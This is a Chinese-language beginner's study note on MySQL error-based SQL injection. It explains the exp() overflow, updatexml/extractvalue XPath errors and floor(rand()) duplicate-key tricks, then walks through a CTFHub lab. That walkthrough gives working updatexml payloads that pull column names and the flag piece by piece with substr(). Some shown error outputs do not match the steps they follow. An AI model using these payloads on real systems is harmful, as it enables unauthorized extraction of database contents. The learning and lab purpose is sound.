SQL--报错注入学习

1、对报错注入的理解

         报错注入就是通过一些函数的错误使用后从报错的内容中获取信息，就是在可以进行sql注入的位置，调用特殊的函数执行，利用函数报错使其输出错误结果来获取数据库的相关信息。

       当注入点不回显数据库查询的数据，那么通过一般的注入手段是无法返回相关数据库的信息，但是，如果查询时输入错误SQL代码会报错，并且是通过mysql_error()，mysqli_error()等返回错误，那么就存在报错注入的可能性。

2、报错注入的种类

  （1）.BigInt数据类型溢出

          exp(int)函数返回e的x次方，当x的值足够大的时候就会导致函数的结果数据类型溢出，也就会因此报错："DOUBLE value is out of range"

          exp 函数返回浮点参数的指数值，如果成功，则为 x 。 也就是说，结果是 e x ，其中 e 是自然对数的底。 在溢出时，该函数返回 INF （无限），在下溢时， exp 返回 0。

  （2）.函数参数格式错误

         两个重要函数：updatexml（） extractvalue ()

         需要构造Xpath_string格式错误，也就是将Xpath_string的值传递成不符合格式的参数，mysql就会报错

updatexml()函数语法：updatexml(XML_document,Xpath_string,new_value)

XML_document:   字符串String格式，为XML文档对象名称

Xpath_string:         Xpath格式的字符串

new_value:            string格式，替换查找到的符合条件的数据

    （3）主键冲突（重复）

         利用 select count(*),(floor(rand(0)*2)) x from users group by x这个相对固定的语句格式，导致的数据库报错

         主键重复方式的报错注入利用的函数有： floor() + rand() + group() + count()

       rand()是一个随机函数，通过一个固定的随机数的种子0之后，产生大于等于0小于1的伪随机序列

     floor() 函数的作用就是返回小于等于括号内该值的最大整数，也就是取整。

报错原因分析：

  select count(*),(floor(rand(0)*2)) x from users group by x

3、执行流程：

（1）用户输入参数（用户id）

（2）后台执行SQL（查询用户信息）

（3）查询结果在前端回显

注：version()：返回数据库版本

      concat()：拼接特殊符号和查询结果

4.长度限制

updatexml() 函数的报错内容长度不能超过32个字符，常用的解决方式有两种：

1. limit 分页
2. substr()截取字符

以ctfhub-报错注入 为例

使用floor()      1.查询表名

查询错误: Subquery returns more than 1 row

2.这个报错说明该数据库下有多个表，需要用limit依次查找

查询错误: Duplicate entry 'flag1' for key 'group_key'
第二个表flag存有flag，这里拼接了一个1作为查询语句，因此要忽略

3.查询列名   1 and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag'),0x7e),1) #

查询错误: Duplicate entry 'flag1' for key 'group_key'
第二个表flag的列flag存有flag

4.变值     1 and updatexml(1,concat(0x7e,(select flag from flag),0x7e),1) #

           这里发现回显不完整，需要获取该数据的长度。    1 and updatexml(1,concat(0x7e,(select length(flag) from flag),0x7e),1) #

      可以发现该数据一共有32 位。

     注：   length() --- 常用于获取字符串的长度，用于验证字符串的有效性，计算字符个数以及进行字符串比较等操作。

               substr(string,start,length)
               string --- 提取字符串的源字符串。
               start --- 子字符串的起始位置，它可以是一个正整数或负整数。对于正整数，表示从左向右的偏移量，其中第一个字符的位置为1；对于负整数，表示从右向左的偏移量，其中最后一个字符的位置为-1。
               length --- 提取的子字符串的长度，是一个可选参数。如果指定了长度，将从起始位置开始提取指定长度的子字符串；如果未指定长度，则将提取从起始位置到字符串末尾的所有字符。         因为无法一次性将数据全部回显，所以需要截取位数，分步获取。                                                    1 and updatexml(1,concat(0x7e,(select substr(flag,1,16) from flag),0x7e),1) #
      1 and updatexml(1,concat(0x7e,(select substr(flag,17,32) from flag),0x7e),1) #  

   需要将两次的数据拼凑在一起，就是整个flag 的内容。

                                                                                                           小白入门，请大家多多指教！